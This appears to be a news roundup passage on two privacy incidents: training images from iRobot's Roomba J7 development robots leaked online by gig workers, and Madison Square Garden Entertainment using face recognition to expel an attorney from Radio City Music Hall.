The Roomba J7 home robot uses “PrecisionVision Navigation” to avoid objects in your home—such as piles of clothes on the floor or accidental piles of dog crap. The robot is partly able to do this using a built-in camera and computer vision. However, as _MIT Technology Review_ reported this week, gig economy workers in Venezuela posted photos from the robots online—including one image of a woman on the toilet. The photos and videos were captured by a development version of the J7 robot in 2020 and shared with a startup that contracts workers to label the images, helping to train computer vision systems. Those using the development machines had agreed for their data to be shared. Roomba maker iRobot, which is being purchased by Amazon, said it is ending its contract with the startup that leaked the images and is investigating what happened. However, the incident highlights some of the potential privacy risks with the vast data sets that are used to train artificial intelligence applications.

All Kelly Conlon wanted to do was watch the Rockettes with her daughter’s Girl Scout troop. But thanks to a face recognition system run by Madison Square Garden Entertainment, Conlon was summarily kicked out of Radio City Music Hall because she was unknowingly banned from the venue. The issue, according to MSG Entertainment, is that Conlon is an attorney at a law firm that’s currently engaged in litigation against the company. (Conlon said she is not personally involved in that litigation.) “They knew my name before I told them. They knew the firm I was associated with before I told them. And they told me I was not allowed to be there,” Conlon told NBC New York. MSG Entertainment, meanwhile, defended the attorney's expulsion as necessary to avoid an “inherently adverse environment.” The episode adds to concerns over the use of face-recognition tech, which remains so underregulated that a corporation can use it to punish its enemies. Happy holidays!

Tag

#wifi